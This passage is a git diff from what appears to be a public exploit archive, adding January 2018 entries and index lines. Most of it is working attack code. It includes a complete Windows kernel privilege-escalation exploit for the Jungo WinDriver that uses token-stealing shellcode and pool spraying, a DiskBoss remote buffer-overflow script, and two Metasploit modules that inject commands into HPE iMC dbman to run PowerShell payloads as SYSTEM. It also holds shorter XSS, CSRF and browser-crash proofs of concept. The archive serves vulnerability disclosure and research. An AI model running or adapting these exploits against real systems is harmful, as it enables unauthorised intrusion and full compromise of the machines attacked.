+the package is defined by the `$_REQUEST['addon']` if is set without any
+validation.
+
+A malicious actor can exploit this to install a malicious plugin in the
+vulnerable site. In fact the install package doesn't need to be a valid
+plugin, it could just contain malicious code. Because the package is
+extracted in the `/wp-content/plugins/` dir without changing it's original
+folder structure, an attacker could leverage the CSRF to upload malicious
+code and execute the code on the infected server.
+
+PoC
+---
+
+```
+
+
+```
+
+Solution
+--------
+
+Update to version 2.9.61.
+
+Timeline
+--------
+
+1. **2017-12-12**: Discovered
+2. **2017-12-14**: Tried to reach out to vendor using support email address
+3. **2017-12-16**: Vendor replied
+4. **2017-12-16**: Vendor received details
+5. **2017-12-21**: Vendor released a fix
\ No newline at end of file
diff --git a/exploits/php/webapps/43488.txt b/exploits/php/webapps/43488.txt
new file mode 100644
index 000000000..abaed6888
--- /dev/null
+++ b/exploits/php/webapps/43488.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Joomla Plugin Easydiscuss <4.0.21 Persistent XSS in Edit Message
+# Date: 06-01-2018
+# Software Link: https://stackideas.com/easydiscuss
+# Exploit Author: Mattia Furlani
+# CVE: CVE-2018-5263
+# Category: webapps
+
+1. Description
+
+Whenever a user edits a message with <\textarea> inside the body, everything after the <\textarea> will be executed in the user’s browser. Works with every version up to 4.0.20
+
+
+2. Proof of Concept
+
+Login with permissions to post a message, insert <\textarea> in the body and add any html code after that, whenever a user tries to edit that message the code writed after you closed the textarea will be executed
+
+
+3. Solution:
+
+Update to version 4.0.21
+https://stackideas.com/blog/easydiscuss4021-update
\ No newline at end of file
diff --git a/exploits/windows/dos/43491.js b/exploits/windows/dos/43491.js
new file mode 100644
index 000000000..c0bb1a5a8
--- /dev/null
+++ b/exploits/windows/dos/43491.js
@@ -0,0 +1,28 @@
+/*
+The method "Lowerer::LowerSetConcatStrMultiItem" is used to generate machine code to concatenate strings.
+Here's a snippet of the method.
+void Lowerer::LowerSetConcatStrMultiItem(IR::Instr * instr)
+{
+ ...
+ IR::IndirOpnd * dstLength = IR::IndirOpnd::New(concatStrOpnd, Js::ConcatStringMulti::GetOffsetOfcharLength(), TyUint32, func);
+ ...
+ InsertAdd(false, dstLength, dstLength, srcLength, instr); <<------ (a)
+ ...
+}
+
+At (a), there's no check for integer overflow.
+
+Note: Chakra uses string chains to handle concatenated strings(the ConcatString class). So it doesn't require much memory to trigger the bug.
+
+PoC:
+*/
+
+let a = '';
+let b = 'A'.repeat(0x10000);
+for (let i = 0; i < 0x10000; i++) {
+ a = 'BBBBBBBBB' + a + b;
+}
+
+print(a.length);
+print(b.length);
+print(a[0]);
\ No newline at end of file
diff --git a/exploits/windows/local/43494.cpp b/exploits/windows/local/43494.cpp
new file mode 100644
index 000000000..40a03d668
--- /dev/null
+++ b/exploits/windows/local/43494.cpp
@@ -0,0 +1,322 @@
+// ConsoleApplication1.cpp : Defines the entry point for the console application.
+//
+
+#include "stdafx.h"
+#include
+#include
+
+#define device L"\\\\.\\WINDRVR1251"
+#define SPRAY_SIZE 30000
+
+typedef NTSTATUS(WINAPI *PNtAllocateVirtualMemory)(
+ HANDLE ProcessHandle,
+ PVOID *BaseAddress,
+ ULONG ZeroBits,
+ PULONG AllocationSize,
+ ULONG AllocationType,
+ ULONG Protect
+ );
+
+// Windows 7 SP1 x86 Offsets
+#define KTHREAD_OFFSET 0x124 // nt!_KPCR.PcrbData.CurrentThread
+#define EPROCESS_OFFSET 0x050 // nt!_KTHREAD.ApcState.Process
+#define PID_OFFSET 0x0B4 // nt!_EPROCESS.UniqueProcessId
+#define FLINK_OFFSET 0x0B8 // nt!_EPROCESS.ActiveProcessLinks.Flink
+#define TOKEN_OFFSET 0x0F8 // nt!_EPROCESS.Token
+#define SYSTEM_PID 0x004 // SYSTEM Process PID
+/*
+* The caller expects to call a cdecl function with 4 (0x10 bytes) arguments.
+*/
+__declspec(naked) VOID TokenStealingShellcode() {
+ __asm {
+ hasRun:
+ xor eax, eax; Set zero
+ cmp byte ptr [eax], 1; If this is 1, we have already run this code
+ jz End;
+ mov byte ptr [eax], 1; Indicate that this code has been hit already
+
+ ; initialize
+ mov eax, fs:[eax + KTHREAD_OFFSET]; Get nt!_KPCR.PcrbData.CurrentThread
+ mov eax, [eax + EPROCESS_OFFSET]; Get nt!_KTHREAD.ApcState.Process
+
+ mov ecx, eax; Copy current _EPROCESS structure
+
+ mov ebx, [eax + TOKEN_OFFSET]; Copy current nt!_EPROCESS.Token
+ mov edx, SYSTEM_PID; WIN 7 SP1 SYSTEM Process PID = 0x4
+
+ ; begin system token search loop
+ SearchSystemPID :
+ mov eax, [eax + FLINK_OFFSET]; Get nt!_EPROCESS.ActiveProcessLinks.Flink
+ sub eax, FLINK_OFFSET
+ cmp[eax + PID_OFFSET], edx; Get nt!_EPROCESS.UniqueProcessId
+ jne SearchSystemPID
+
+ mov edx, [eax + TOKEN_OFFSET]; Get SYSTEM process nt!_EPROCESS.Token
+ mov[ecx + TOKEN_OFFSET], edx; Copy nt!_EPROCESS.Token of SYSTEM to current process
+
+ End :
+ ret 0x10; cleanup for cdecl
+
+ }
+}
+
+BOOL map_null_page()
+{
+ /* Begin NULL page map */
+ HMODULE hmodule = LoadLibraryA("ntdll.dll");
+ if (hmodule == INVALID_HANDLE_VALUE)
+ {
+ printf("[x] Couldn't get handle to ntdll.dll\n");
+ return FALSE;
+ }
+ PNtAllocateVirtualMemory AllocateVirtualMemory = (PNtAllocateVirtualMemory)GetProcAddress(hmodule, "NtAllocateVirtualMemory");
+ if (AllocateVirtualMemory == NULL)
+ {
+ printf("[x] Couldn't get address of NtAllocateVirtualMemory\n");
+ return FALSE;
+ }
+
+ SIZE_T size = 0x1000;
+ PVOID address = (PVOID)0x1;
+ NTSTATUS allocStatus = AllocateVirtualMemory(GetCurrentProcess(),
+ &address,
+ 0,
+ &size,
+ MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,
+ PAGE_EXECUTE_READWRITE);
+
+ if (allocStatus != 0)
+ {
+ printf("[x] Error mapping null page\n");
+ return FALSE;
+ }
+
+ printf("[+] Mapped null page\n");
+ return TRUE;
+}
+
+/*
+* Continually flip the size
+* @Param user_size - a pointer to the user defined size
+*/
+DWORD WINAPI flip_thread(LPVOID user_size)
+{
+ printf("[+] Flipping thread started\n");
+ while (TRUE)
+ {
+ *(ULONG *)(user_size) ^= 10; //flip between 0x52 and 0x58, giving a 0x40 byte overflow.
+ }
+ return 0;
+}
+
+DWORD WINAPI ioctl_thread(LPVOID user_buff)
+{
+ char out_buff[40];
+ DWORD bytes_returned;
+
+ HANDLE hdevice = CreateFile(device,
+ GENERIC_READ | GENERIC_WRITE,
+ FILE_SHARE_READ | FILE_SHARE_WRITE,
+ NULL,
+ OPEN_EXISTING,
+ FILE_ATTRIBUTE_NORMAL,
+ 0
+ );
+
+
+ if (hdevice == INVALID_HANDLE_VALUE)
+ {
+ printf("[x] Couldn't open device\n");
+ }
+
+ NTSTATUS ret = DeviceIoControl(hdevice,
+ 0x95382623,
+ user_buff,
+ 0x1000,
+ out_buff,
+ 40,
+ &bytes_returned,
+ 0);
+
+ CloseHandle(hdevice);
+ return 0;
+}
+
+void spray_pool(HANDLE handle_arr[])
+{
+ //create SPRAY_SIZE event objects filling up the pool
+ for (int i = 0; i < SPRAY_SIZE; i++)
+ {
+ handle_arr[i] = CreateEvent(NULL, 0, NULL, L"");
+ }
+
+ for (int i = 0; i < SPRAY_SIZE; i+=50)
+ {
+ for (int j = 0; j < 14 && j + i < SPRAY_SIZE; j++)
+ {
+ CloseHandle(handle_arr[j + i]);
+ handle_arr[j + i] = 0;
+ }
+ }
+}
+
+void free_events(HANDLE handle_arr[])
+{
+ for (int i = 0; i < SPRAY_SIZE; i++)
+ {
+ if (handle_arr[i] != 0)
+ {
+ CloseHandle(handle_arr[i]);
+ }
+ }
+}
+
+BOOL check_priv_count(DWORD old_count, PDWORD updated_count)
+{
+ HANDLE htoken;
+ DWORD length;
+ DWORD temp;
+ DWORD new_count;
+ PTOKEN_PRIVILEGES current_priv = NULL;
+
+ if (!OpenProcessToken(GetCurrentProcess(), GENERIC_READ, &htoken))
+ {
+ printf("[x] Couldn't get current token\n");
+ return FALSE;
+ }
+
+ //get the size required for the current_priv allocation
+ GetTokenInformation(htoken, TokenPrivileges, current_priv, 0, &length);
+
+ //allocate memory for the structure
+ current_priv = (PTOKEN_PRIVILEGES)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, length);
+
+ //get the actual token info
+ GetTokenInformation(htoken, TokenPrivileges, current_priv, length, &length);
+ new_count = current_priv->PrivilegeCount;
+
+ HeapFree(GetProcessHeap(), 0, current_priv);
+ CloseHandle(htoken);
+
+ temp = old_count; //store the old count
+ *updated_count = new_count; //update the count
+ if (new_count > old_count)
+ {
+ printf("[+] We now have %d privileges\n", new_count);
+ return TRUE;
+ }
+ else
+ return FALSE;
+}
+
+int main()
+{
+ HANDLE h_flip_thread;
+ HANDLE h_ioctl_thread;
+ HANDLE handle_arr[SPRAY_SIZE] = { 0 };
+ DWORD mask = 0;
+ DWORD orig_priv_count = 0;
+ char *user_buff;
+
+ check_priv_count(-1, &orig_priv_count);
+ printf("[+] Original priv count: %d\n", orig_priv_count);
+
+ if (!map_null_page())
+ {
+ return -1;
+ }
+
+ *(ULONG *)0x74 = (ULONG)&TokenStealingShellcode;
+
+ user_buff = (char *)VirtualAlloc(NULL,
+ 0x1000,
+ MEM_COMMIT | MEM_RESERVE,
+ PAGE_NOCACHE | PAGE_READWRITE);
+
+ if (user_buff == NULL)
+ {
+ printf("[x] Couldn't allocate memory for buffer\n");
+ return -1;
+ }
+ memset(user_buff, 0x41, 0x1000);
+
+ *(ULONG *)(user_buff + 0x34) = 0x00000052; //set the size initially to 0x51
+
+ //pool header block
+ *(ULONG *)(user_buff + 0x374) = 0x04080070; //ULONG1
+ *(ULONG *)(user_buff + 0x378) = 0xee657645;//PoolTag
+
+ //QuotaInfo block
+ *(ULONG *)(user_buff + 0x37c) = 0x00000000; //PagedPoolCharge
+ *(ULONG *)(user_buff + 0x380) = 0x00000040; //NonPagedPoolCharge
+ *(ULONG *)(user_buff + 0x384) = 0x00000000; //SecurityDescriptorCharge
+ *(ULONG *)(user_buff + 0x388) = 0x00000000; //SecurityDescriptorQuotaBlock
+
+ //Event header block
+ *(ULONG *)(user_buff + 0x38c) = 0x00000001; //PointerCount
+ *(ULONG *)(user_buff + 0x390) = 0x00000001; //HandleCount
+ *(ULONG *)(user_buff + 0x394) = 0x00000000; //NextToFree
+ *(ULONG *)(user_buff + 0x398) = 0x00080000; //TypeIndex <--- NULL POINTER
+ *(ULONG *)(user_buff + 0x39c) = 0x867b3940; //objecteCreateInfo
+ *(ULONG *)(user_buff + 0x400) = 0x00000000;
+ *(ULONG *)(user_buff + 0x404) = 0x867b3940; //QuotaBlockCharged
+
+
+
+ /*
+ * create a suspended thread for flipping, passing in a pointer to the size at user_buff+0x34
+ * Set its priority to highest.
+ * Set its mask so that it runs on a particular core.
+ */
+ h_flip_thread = CreateThread(NULL, 0, flip_thread, user_buff + 0x34, CREATE_SUSPENDED, 0);
+ SetThreadPriority(h_flip_thread, THREAD_PRIORITY_HIGHEST);
+ SetThreadAffinityMask(h_flip_thread, 0);
+ ResumeThread(h_flip_thread);
+ printf("[+] Starting race...\n");
+
+ spray_pool(handle_arr);
+
+ while (TRUE)
+ {
+ h_ioctl_thread = CreateThread(NULL, 0, ioctl_thread, user_buff, CREATE_SUSPENDED, 0);
+ SetThreadPriority(h_ioctl_thread, THREAD_PRIORITY_HIGHEST);
+ SetThreadAffinityMask(h_ioctl_thread, 1);
+
+ ResumeThread(h_ioctl_thread);
+
+ WaitForSingleObject(h_ioctl_thread, INFINITE);
+
+ free_events(handle_arr); //free the event objects
+
+ if (check_priv_count(orig_priv_count, &orig_priv_count))
+ {
+ printf("[+] Breaking out of loop, popping shell!\n");
+ break;
+ }
+ //pool header block
+ *(ULONG *)(user_buff + 0x374) = 0x04080070; //ULONG1
+ *(ULONG *)(user_buff + 0x378) = 0xee657645;//PoolTag
+
+ //QuotaInfo block
+ *(ULONG *)(user_buff + 0x37c) = 0x00000000; //PagedPoolCharge
+ *(ULONG *)(user_buff + 0x380) = 0x00000040; //NonPagedPoolCharge
+ *(ULONG *)(user_buff + 0x384) = 0x00000000; //SecurityDescriptorCharge
+ *(ULONG *)(user_buff + 0x388) = 0x00000000; //SecurityDescriptorQuotaBlock
+
+ //Event header block
+ *(ULONG *)(user_buff + 0x38c) = 0x00000001; //PointerCount
+ *(ULONG *)(user_buff + 0x390) = 0x00000001; //HandleCount
+ *(ULONG *)(user_buff + 0x394) = 0x00000000; //NextToFree
+ *(ULONG *)(user_buff + 0x398) = 0x00080000; //TypeIndex <--- NULL POINTER
+ *(ULONG *)(user_buff + 0x39c) = 0x867b3940; //objecteCreateInfo
+ *(ULONG *)(user_buff + 0x400) = 0x00000000;
+ *(ULONG *)(user_buff + 0x404) = 0x867b3940; //QuotaBlockCharged
+
+
+ spray_pool(handle_arr);
+ }
+
+ system("cmd.exe");
+
+ return 0;
+}
\ No newline at end of file
diff --git a/exploits/windows/remote/43408.py b/exploits/windows/remote/43408.py
index d3912ae33..ccb9d34bd 100755
--- a/exploits/windows/remote/43408.py
+++ b/exploits/windows/remote/43408.py
@@ -1,3 +1,5 @@
+#!/usr/bin/pythion
+
# Exploit Title: Buffer overflow in NetTransport Download Manager - Version 2.96L (DEP Bypass)
# CVE: CVE-2017-17968
# Date: 28-12-2017
@@ -8,12 +10,12 @@
# Category: webapps
# Impact: Code execution
-1. Description
-
-A buffer overflow vulnerability in NetTransport.exe in NetTransport Download Manager 2.96L and earlier could allow remote HTTP servers to execute arbitrary code on NAS devices via a long HTTP response. To exploit this vulnerability, an attacker needs to issue a malicious-crafted payload in the HTTP Response Header. A successful attack could result in code execution
-
-2. Proof of Concept
-
+#1. Description
+#
+#A buffer overflow vulnerability in NetTransport.exe in NetTransport Download Manager 2.96L and earlier could allow remote HTTP servers to execute arbitrary code on NAS devices via a long HTTP response. To exploit this vulnerability, an attacker needs to issue a malicious-crafted payload in the HTTP Response Header. A successful attack could result in code execution
+#
+#2. Proof of Concept
+ #
#!/usr/bin/pythion
@@ -114,6 +116,6 @@ if __name__ == '__main__':
-3. Solution:
-
-No solution available at the moment.
\ No newline at end of file
+#3. Solution:
+#
+#No solution available at the moment.
\ No newline at end of file
diff --git a/exploits/windows/remote/43478.py b/exploits/windows/remote/43478.py
new file mode 100755
index 000000000..795879e3a
--- /dev/null
+++ b/exploits/windows/remote/43478.py
@@ -0,0 +1,105 @@
+# Exploit Title: DiskBoss <= 8.8.16 - Unauthenticated Remote Code Execution
+# Date: 2017-08-27
+# Exploit Author: Arris Huijgen
+# Vendor Homepage: http://www.diskboss.com/
+# Software Link: http://www.diskboss.com/setups/diskbossent_setup_v8.8.16.exe
+# Version: Through 8.8.16
+# Tested on: Windows 7 SP1 x64, Windows XP SP3 x86
+# CVE: CVE-2018-5262
+
+# Usage
+# 1. Update the Target section
+# 2. Update the shellcode
+# 3. Launch!
+
+
+import socket
+from struct import pack
+
+# Software editions (port, offset)
+free8416 = (8096, 0x10036e9a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
+pro8416 = (8097, 0x10036e9a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
+ult8416 = (8098, 0x10036e9a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
+srv8416 = (8094, 0x1001806e) # ADD ESP,8 | RET 0x04 @ libpal.dll
+ent8416 = (8094, 0x1001806e) # ADD ESP,8 | RET 0x04 @ libpal.dll
+ent8512 = (8094, 0x100180ee) # ADD ESP,8 | RET 0x04 @ libpal.dll
+free8816 = (8096, 0x10037f6a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
+pro8816 = (8097, 0x10037f6a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
+ult8816 = (8098, 0x10037f6a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
+srv8816 = (8094, 0x100180f9) # ADD ESP,8 | RET 0x04 @ libpal.dll
+ent8816 = (8094, 0x100180f9) # ADD ESP,8 | RET 0x04 @ libpal.dll
+
+
+# Target
+host = '127.0.0.1'
+(port, addr) = ent8816
+
+
+def main():
+ # Connect
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.connect((host, port))
+ print '[+] Connected to %s:%d' % (host, port)
+
+ # Memory
+ size = 1000
+ offset = 128
+
+ # Payload
+ preret = '\xEB\x06\x90\x90' # JMP 0x06
+ ret = pack(' 'HPE iMC dbman RestoreDBase Unauthenticated RCE',
+ 'Description' => %q{
+ This module exploits a remote command execution vulnerablity in
+ Hewlett Packard Enterprise Intelligent Management Center before
+ version 7.3 E0504P04.
+
+ The dbman service allows unauthenticated remote users to restore
+ a user-specified database (OpCode 10007), however the database
+ connection username is not sanitized resulting in command injection,
+ allowing execution of arbitrary operating system commands as SYSTEM.
+ This service listens on TCP port 2810 by default.
+
+ This module has been tested successfully on iMC PLAT v7.2 (E0403)
+ on Windows 7 SP1 (EN).
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'sztivi', # Discovery
+ 'Chris Lyne', # Python PoC (@lynerc)
+ 'Brendan Coles ' # Metasploit
+ ],
+ 'References' =>
+ [
+ ['CVE', '2017-5817'],
+ ['EDB', '43195'],
+ ['ZDI', '17-341'],
+ ['URL', 'https://www.securityfocus.com/bid/98469/info'],
+ ['URL', 'https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03745en_us']
+ ],
+ 'Platform' => 'win',
+ 'Targets' => [['Automatic', {}]],
+ 'Payload' => { 'BadChars' => "\x00" },
+ 'DefaultOptions' => { 'WfsDelay' => 15 },
+ 'Privileged' => true,
+ 'DisclosureDate' => 'May 15 2017',
+ 'DefaultTarget' => 0))
+ register_options [Opt::RPORT(2810)]
+ end
+
+ def check
+ # empty RestoreDBase packet
+ pkt = [10007].pack('N')
+
+ connect
+ sock.put pkt
+ res = sock.get_once
+ disconnect
+
+ # Expected reply:
+ # "\x00\x00\x00\x01\x00\x00\x00:08\x02\x01\xFF\x043Dbman deal msg error, please to see dbman_debug.log"
+ return CheckCode::Detected if res =~ /dbman/i
+
+ CheckCode::Safe
+ end
+
+ def dbman_msg(database_user)
+ data = ''
+
+ db_ip = "#{rand(255)}.#{rand(255)}.#{rand(255)}.#{rand(255)}"
+ database_type = "\x03" # MySQL
+ restore_type = 'MANUAL'
+ database_password = rand_text_alpha rand(1..5)
+ database_port = rand_text_alpha rand(1..5)
+ database_instance = rand_text_alpha rand(1..5)
+ junk = rand_text_alpha rand(1..5)
+
+ # database ip
+ data << "\x04"
+ data << [db_ip.length].pack('C')
+ data << db_ip
+
+ # ???
+ data << "\x04"
+ data << [junk.length].pack('C')
+ data << junk
+
+ # ???
+ data << "\x04"
+ data << [junk.length].pack('C')
+ data << junk
+
+ # junk
+ data << "\x04"
+ data << [junk.length].pack('C')
+ data << junk
+
+ # ???
+ data << "\x02\x01\x01"
+
+ # database type
+ data << "\x02"
+ data << [database_type.length].pack('C')
+ data << database_type
+
+ # restore type
+ data << "\x04"
+ data << [restore_type.length].pack('C')
+ data << restore_type
+
+ # ???
+ data << "\x04"
+ data << [junk.length].pack('C')
+ data << junk
+
+ # database user
+ data << "\x04"
+ data << "\x82"
+ data << [database_user.length].pack('n')
+ data << database_user
+
+ # database password
+ data << "\x04"
+ data << [database_password.length].pack('C')
+ data << database_password
+
+ # database port
+ data << "\x04"
+ data << [database_port.length].pack('C')
+ data << database_port
+
+ # database instance
+ data << "\x04"
+ data << [database_instance.length].pack('C')
+ data << database_instance
+
+ # ???
+ data << "\x04"
+ data << [junk.length].pack('C')
+ data << junk
+
+ # ???
+ data << "\x04"
+ data << [junk.length].pack('C')
+ data << junk
+
+ # ???
+ data << "\x04"
+ data << [junk.length].pack('C')
+ data << junk
+
+ # ???
+ data << "\x04"
+ data << [junk.length].pack('C')
+ data << junk
+
+ # ???
+ data << "\x30\x00"
+ data << "\x02\x01\x01"
+
+ data
+ end
+
+ def dbman_restoredbase_pkt(database_user)
+ data = dbman_msg database_user
+
+ # opcode 10007 (RestoreDBase)
+ pkt = [10007].pack('N')
+
+ # packet length
+ pkt << "\x00\x00"
+ pkt << [data.length + 4].pack('n')
+
+ # packet data length
+ pkt << "\x30\x82"
+ pkt << [data.length].pack('n')
+
+ # packet data
+ pkt << data
+
+ pkt
+ end
+
+ def execute_command(cmd, _opts = {})
+ connect
+ sock.put dbman_restoredbase_pkt "\"& #{cmd} &"
+ disconnect
+ end
+
+ def exploit
+ command = cmd_psh_payload(
+ payload.encoded,
+ payload_instance.arch.first,
+ { :remove_comspec => true, :encode_final_payload => true }
+ )
+
+ if command.length > 8000
+ fail_with Failure::BadConfig, "#{peer} - The selected payload is too long to execute through Powershell in one command"
+ end
+
+ print_status "Sending payload (#{command.length} bytes)..."
+ execute_command command
+ end
+end
\ No newline at end of file
diff --git a/exploits/windows/remote/43493.rb b/exploits/windows/remote/43493.rb
new file mode 100755
index 000000000..3f2beaa82
--- /dev/null
+++ b/exploits/windows/remote/43493.rb
@@ -0,0 +1,153 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::Powershell
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'HPE iMC dbman RestartDB Unauthenticated RCE',
+ 'Description' => %q{
+ This module exploits a remote command execution vulnerablity in
+ Hewlett Packard Enterprise Intelligent Management Center before
+ version 7.3 E0504P04.
+
+ The dbman service allows unauthenticated remote users to restart
+ a user-specified database instance (OpCode 10008), however the
+ instance ID is not sanitized, allowing execution of arbitrary
+ operating system commands as SYSTEM. This service listens on
+ TCP port 2810 by default.
+
+ This module has been tested successfully on iMC PLAT v7.2 (E0403)
+ on Windows 7 SP1 (EN).
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'sztivi', # Discovery
+ 'Chris Lyne', # Python PoC (@lynerc)
+ 'Brendan Coles ' # Metasploit
+ ],
+ 'References' =>
+ [
+ ['CVE', '2017-5816'],
+ ['EDB', '43198'],
+ ['ZDI', '17-340'],
+ ['URL', 'https://www.securityfocus.com/bid/98469/info'],
+ ['URL', 'https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03745en_us']
+ ],
+ 'Platform' => 'win',
+ 'Targets' => [['Automatic', {}]],
+ 'Payload' => { 'BadChars' => "\x00" },
+ 'DefaultOptions' => { 'WfsDelay' => 15 },
+ 'Privileged' => true,
+ 'DisclosureDate' => 'May 15 2017',
+ 'DefaultTarget' => 0))
+ register_options [Opt::RPORT(2810)]
+ end
+
+ def check
+ # empty RestartDB packet
+ pkt = [10008].pack('N')
+
+ connect
+ sock.put pkt
+ res = sock.get_once
+ disconnect
+
+ # Expected reply:
+ # "\x00\x00\x00\x01\x00\x00\x00:08\x02\x01\xFF\x043Dbman deal msg error, please to see dbman_debug.log"
+ return CheckCode::Detected if res =~ /dbman/i
+
+ CheckCode::Safe
+ end
+
+ def dbman_msg(db_instance)
+ data = ''
+
+ db_ip = "#{rand(255)}.#{rand(255)}.#{rand(255)}.#{rand(255)}"
+ db_type = "\x04" # SQL Server
+ db_sa_username = rand_text_alpha rand(1..5)
+ db_sa_password = rand_text_alpha rand(1..5)
+ ora_db_ins = rand_text_alpha rand(1..5)
+
+ # dbIp
+ data << "\x04"
+ data << [db_ip.length].pack('C')
+ data << db_ip
+
+ # iDBType
+ data << "\x02"
+ data << [db_type.length].pack('C')
+ data << db_type
+
+ # dbInstance
+ data << "\x04"
+ data << "\x82"
+ data << [db_instance.length].pack('n')
+ data << db_instance
+
+ # dbSaUserName
+ data << "\x04"
+ data << [db_sa_username.length].pack('C')
+ data << db_sa_username
+
+ # dbSaPassword
+ data << "\x04"
+ data << [db_sa_password.length].pack('C')
+ data << db_sa_password
+
+ # strOraDbIns
+ data << "\x04"
+ data << [ora_db_ins.length].pack('C')
+ data << ora_db_ins
+
+ data
+ end
+
+ def dbman_restartdb_pkt(db_instance)
+ data = dbman_msg db_instance
+
+ # opcode 10008 (RestartDB)
+ pkt = [10008].pack('N')
+
+ # packet length
+ pkt << "\x00\x00"
+ pkt << [data.length + 4].pack('n')
+
+ # packet data length
+ pkt << "\x30\x82"
+ pkt << [data.length].pack('n')
+
+ # packet data
+ pkt << data
+
+ pkt
+ end
+
+ def execute_command(cmd, _opts = {})
+ connect
+ sock.put dbman_restartdb_pkt "\"& #{cmd} &"
+ disconnect
+ end
+
+ def exploit
+ command = cmd_psh_payload(
+ payload.encoded,
+ payload_instance.arch.first,
+ { :remove_comspec => true, :encode_final_payload => true }
+ )
+
+ if command.length > 8000
+ fail_with Failure::BadConfig, "#{peer} - The selected payload is too long to execute through Powershell in one command"
+ end
+
+ print_status "Sending payload (#{command.length} bytes)..."
+ execute_command command
+ end
+end
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 0cd10f0d7..baf918c71 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5449,6 +5449,8 @@ id,file,description,date,author,type,platform,port
43454,exploits/windows/dos/43454.py,"DiskBoss Enterprise 8.5.12 - Denial of Service",2018-01-08,"Ahmad Mahfouz",dos,windows,
43456,exploits/windows/dos/43456.txt,"BarcodeWiz ActiveX Control < 6.7 - Buffer Overflow (PoC)",2018-01-08,hyp3rlinx,dos,windows,
43471,exploits/windows/dos/43471.cpp,"Microsoft Windows - 'nt!NtQuerySystemInformation (information class 138_ QueryMemoryTopologyInformation)' Kernel Pool Memory Disclosure",2018-01-09,"Google Security Research",dos,windows,
+43490,exploits/hardware/dos/43490.txt,"Multiple CPUs - Information Leak Using Speculative Execution",2018-01-10,"Google Security Research",dos,hardware,
+43491,exploits/windows/dos/43491.js,"Microsoft Edge Chakra JIT - 'Lowerer::LowerSetConcatStrMultiItem' Missing Integer Overflow Check",2018-01-10,"Google Security Research",dos,windows,
41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",dos,windows,
41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows,
41637,exploits/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,dos,windows,
@@ -9259,6 +9261,7 @@ id,file,description,date,author,type,platform,port
43427,exploits/multiple/local/43427.c,"Multiple CPUs - 'Spectre' Information Disclosure",2018-01-03,Multiple,local,multiple,
43449,exploits/linux/local/43449.rb,"VMware Workstation - ALSA Config File Local Privilege Escalation (Metasploit)",2018-01-05,Metasploit,local,linux,
43465,exploits/windows/local/43465.txt,"Microsoft Windows - Local XPS Print Spooler Sandbox Escape",2018-01-08,"Google Security Research",local,windows,
+43494,exploits/windows/local/43494.cpp,"Jungo Windriver 12.5.1 - Privilege Escalation",2018-01-10,"Fidus InfoSecurity",local,windows,
41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@@ -15909,6 +15912,9 @@ id,file,description,date,author,type,platform,port
43450,exploits/hardware/remote/43450.py,"Cisco IOS - Remote Code Execution",2018-01-05,"Artem Kondratenko",remote,hardware,
43458,exploits/multiple/remote/43458.py,"Oracle WebLogic < 10.3.6 - 'wls-wsat' Component Deserialisation Remote Command Execution",2018-01-03,"Kevin Kirsche",remote,multiple,
43472,exploits/windows/remote/43472.rb,"Commvault Communications Service (cvd) - Command Injection (Metasploit)",2018-01-09,Metasploit,remote,windows,8400
+43478,exploits/windows/remote/43478.py,"DiskBoss Enterprise 8.8.16 - Buffer Overflow",2018-01-10,"Arris Huijgen",remote,windows,
+43492,exploits/windows/remote/43492.rb,"HPE iMC - dbman RestoreDBase Unauthenticated Remote Command Execution (Metasploit)",2018-01-10,Metasploit,remote,windows,2810
+43493,exploits/windows/remote/43493.rb,"HPE iMC - dbman RestartDB Unauthenticated Remote Command Execution (Metasploit)",2018-01-10,Metasploit,remote,windows,2810
41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows,
41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
@@ -25785,6 +25791,7 @@ id,file,description,date,author,type,platform,port
19187,exploits/php/webapps/19187.txt,"WordPress Plugin Automatic 2.0.3 - SQL Injection",2012-06-16,nick58,webapps,php,
19188,exploits/php/webapps/19188.txt,"Nuked Klan SP CMS 4.5 - SQL Injection",2012-06-16,Vulnerability-Lab,webapps,php,
19189,exploits/php/webapps/19189.txt,"iScripts EasyCreate 2.0 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,webapps,php,
+43474,exploits/php/webapps/43474.rb,"Synology Photostation 6.7.2-3429 - Remote Code Execution (Metasploit)",2018-01-10,"James Bercegay",webapps,php,
